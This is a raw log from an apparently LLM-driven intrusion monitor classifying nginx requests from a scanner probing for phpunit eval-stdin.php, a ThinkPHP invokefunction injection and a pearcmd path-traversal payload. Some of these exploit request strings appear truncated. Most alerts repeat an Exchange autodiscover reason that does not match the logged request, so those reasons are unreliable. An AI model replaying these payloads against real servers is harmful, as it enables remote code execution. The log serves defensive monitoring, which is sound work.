to /autodiscover/autodiscover.json?@zdi/Powershell with 404 indicates probing for Exchange/autodiscover PowerShell payload (common scanning behavior, seen with zgrab/automation). 
Line=2026-03-20T13:45:22.291387071Z 101.36.107.228 - - [20/Mar/2026:13:45:22 +0000] "54.200.221.0" "GET /workspace/drupal/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 2401 "-" "libredta... Mar 20 13:48:30 ip-172-26-12-110 observer[1565011]: 2026/03/20 13:48:30.671712 [analyzer] LLM verdict for docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo: classification=suspicious confidence=0.72 action=alert pattern_type= Mar 20 13:48:30 ip-172-26-12-110 observer[1565011]: 2026/03/20 13:48:30.671751 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Access to phpunit utility file under /panel/vendor/phpunit/phpunit is a common target for PHP unit testing tool probes; the error shows missing file but indicates an attempted access to a sensitive path. Line=2026-03-20T13:45:22.743822915Z 2026/03/20 13:45:22 [error] 422#422: *750652 open() "/usr/share/nginx/default/panel/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or direct... Mar 20 13:48:30 ip-172-26-12-110 observer[1565011]: 2026/03/20 13:48:30.671803 [ALERT] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=HTTP request to /autodiscover/autodiscover.json?@zdi/Powershell with 404 indicates probing for Exchange/autodiscover PowerShell payload (common scanning behavior, seen with zgrab/automation). Line=2026-03-20T13:45:22.743855111Z 101.36.107.228 - - [20/Mar/2026:13:45:22 +0000] "54.200.221.0" "GET /panel/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 2401 "-" "libredtail-http" "-... 
Mar 20 13:48:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 13:48:31.936712 [observer] Pipeline: processed=5818 pattern_hits=5522 llm_calls=296 llm_errors=3 learned=4 Mar 20 13:48:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 13:48:31.936738 [observer] Patterns: hash=5522 prefix=0 regex=0 contains=0 deny=59 alert=434 suppress=0 misses=296 Mar 20 13:48:36 ip-172-26-12-110 observer[1565011]: 2026/03/20 13:48:36.353077 [analyzer] LLM verdict for docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo: classification=suspicious confidence=0.75 action=alert pattern_type= Mar 20 13:48:36 ip-172-26-12-110 observer[1565011]: 2026/03/20 13:48:36.353119 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Attempted access to phpunit tooling path (eval-stdin.php) which is a common probe for RCE in PHP environments; indicates a potential attempt to abuse known tooling. Line=2026-03-20T13:45:23.165357567Z 2026/03/20 13:45:23 [error] 422#422: *750652 open() "/usr/share/nginx/default/public/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or direc... Mar 20 13:48:36 ip-172-26-12-110 observer[1565011]: 2026/03/20 13:48:36.353191 [ALERT] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=HTTP request to /autodiscover/autodiscover.json?@zdi/Powershell with 404 indicates probing for Exchange/autodiscover PowerShell payload (common scanning behavior, seen with zgrab/automation). Line=2026-03-20T13:45:23.165470105Z 101.36.107.228 - - [20/Mar/2026:13:45:23 +0000] "54.200.221.0" "GET /public/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 2401 "-" "libredtail-http" "... 
Mar 20 13:48:43 ip-172-26-12-110 observer[1565011]: 2026/03/20 13:48:43.288622 [analyzer] LLM verdict for docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo: classification=malicious confidence=0.78 action=deny pattern_type= Mar 20 13:48:43 ip-172-26-12-110 observer[1565011]: 2026/03/20 13:48:43.288660 [ALERT] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Attempted access to phpunit eval-stdin.php path suggests probing for PHP unit-related vulnerability (potential LFI/RCE). Line=2026-03-20T13:45:23.634912445Z 2026/03/20 13:45:23 [error] 422#422: *750652 open() "/usr/share/nginx/default/apps/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directo... Mar 20 13:48:43 ip-172-26-12-110 observer[1565011]: 2026/03/20 13:48:43.288761 [ALERT] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=HTTP request to /autodiscover/autodiscover.json?@zdi/Powershell with 404 indicates probing for Exchange/autodiscover PowerShell payload (common scanning behavior, seen with zgrab/automation). Line=2026-03-20T13:45:23.635068412Z 101.36.107.228 - - [20/Mar/2026:13:45:23 +0000] "54.200.221.0" "GET /apps/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 2401 "-" "libredtail-http" "-" Mar 20 13:48:47 ip-172-26-12-110 observer[1565011]: 2026/03/20 13:48:47.912226 [analyzer] LLM verdict for docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo: classification=suspicious confidence=0.72 action=alert pattern_type= Mar 20 13:48:47 ip-172-26-12-110 observer[1565011]: 2026/03/20 13:48:47.912259 [hints] Suggestion for docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo: field type "connection_id" seen in 55/93 lines, example: "*750652" → "" Mar 20 13:48:47 ip-172-26-12-110 observer[1565011]: 2026/03/20 13:48:47.912273 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Access to a PHP unit test file path that does not exist suggests probing for phpunit exposure; not definitive compromise but warrants alert. 
Line=2026-03-20T13:45:24.113365094Z 2026/03/20 13:45:24 [error] 422#422: *750652 open() "/usr/share/nginx/default/app/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or director... Mar 20 13:48:47 ip-172-26-12-110 observer[1565011]: 2026/03/20 13:48:47.912336 [ALERT] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=HTTP request to /autodiscover/autodiscover.json?@zdi/Powershell with 404 indicates probing for Exchange/autodiscover PowerShell payload (common scanning behavior, seen with zgrab/automation). Line=2026-03-20T13:45:24.113505323Z 101.36.107.228 - - [20/Mar/2026:13:45:24 +0000] "54.200.221.0" "GET /app/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 2401 "-" "libredtail-http" "-" Mar 20 13:48:52 ip-172-26-12-110 observer[1565011]: 2026/03/20 13:48:52.517750 [analyzer] LLM verdict for docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo: classification=malicious confidence=0.72 action=deny pattern_type= Mar 20 13:48:52 ip-172-26-12-110 observer[1565011]: 2026/03/20 13:48:52.517785 [ALERT] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Log shows an attempted PHP thinkphp injection payload in the request URL targeting an index.php file, indicative of an exploit attempt. Line=2026-03-20T13:45:24.594617078Z 2026/03/20 13:45:24 [error] 422#422: *750652 open() "/usr/share/nginx/default/index.php" failed (2: No such file or directory), client: 101.36.107.228, server: _, reques... Mar 20 13:48:52 ip-172-26-12-110 observer[1565011]: 2026/03/20 13:48:52.517839 [ALERT] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=HTTP request to /autodiscover/autodiscover.json?@zdi/Powershell with 404 indicates probing for Exchange/autodiscover PowerShell payload (common scanning behavior, seen with zgrab/automation). 
Line=2026-03-20T13:45:24.594737123Z 101.36.107.228 - - [20/Mar/2026:13:45:24 +0000] "54.200.221.0" "GET /index.php?s=/index/\x5Cthink\x5Capp/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1]... Mar 20 13:49:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 13:49:01.417942 [analyzer] LLM verdict for docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo: classification=suspicious confidence=0.65 action=alert pattern_type= Mar 20 13:49:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 13:49:01.417983 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Evidence of an attempted exploit via a crafted request to index.php (thinkphp vulnerability pattern) leading to a file-not-found error. No evidence of success; still suspicious and warrants monitoring. Line=2026-03-20T13:45:25.045104384Z 2026/03/20 13:45:25 [error] 422#422: *750652 open() "/usr/share/nginx/default/public/index.php" failed (2: No such file or directory), client: 101.36.107.228, server: _,... Mar 20 13:49:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 13:49:01.418040 [ALERT] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=HTTP request to /autodiscover/autodiscover.json?@zdi/Powershell with 404 indicates probing for Exchange/autodiscover PowerShell payload (common scanning behavior, seen with zgrab/automation). Line=2026-03-20T13:45:25.045126745Z 101.36.107.228 - - [20/Mar/2026:13:45:25 +0000] "54.200.221.0" "GET /public/index.php?s=/index/\x5Cthink\x5Capp/invokefunction&function=call_user_func_array&vars[0]=md5&... 
Mar 20 13:49:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 13:49:01.956039 [observer] Pipeline: processed=5828 pattern_hits=5527 llm_calls=301 llm_errors=3 learned=4 Mar 20 13:49:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 13:49:01.956071 [observer] Patterns: hash=5527 prefix=0 regex=0 contains=0 deny=64 alert=434 suppress=0 misses=301 Mar 20 13:49:07 ip-172-26-12-110 observer[1565011]: 2026/03/20 13:49:07.446370 [analyzer] LLM verdict for docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo: classification=malicious confidence=0.78 action=deny pattern_type= Mar 20 13:49:07 ip-172-26-12-110 observer[1565011]: 2026/03/20 13:49:07.446408 [ALERT] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Attempted local file access and PHP code injection via crafted request to index.php with path traversal parameters Line=2026-03-20T13:45:25.553743509Z 2026/03/20 13:45:25 [error] 422#422: *750652 open() "/usr/share/nginx/default/index.php" failed (2: No such file or directory), client: 101.36.107.228, server: _, reques... Mar 20 13:49:07 ip-172-26-12-110 observer[1565011]: 2026/03/20 13:49:07.446466 [ALERT] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=HTTP request to /autodiscover/autodiscover.json?@zdi/Powershell with 404 indicates probing for Exchange/autodiscover PowerShell payload (common scanning behavior, seen with zgrab/automation). Line=2026-03-20T13:45:25.553788272Z 101.36.107.228 - - [20/Mar/2026:13:45:25 +0000] "54.200.221.0" "GET /index.php?lang=../../../../../../../../usr/local/lib/php/pearcmd&+config-create+/&/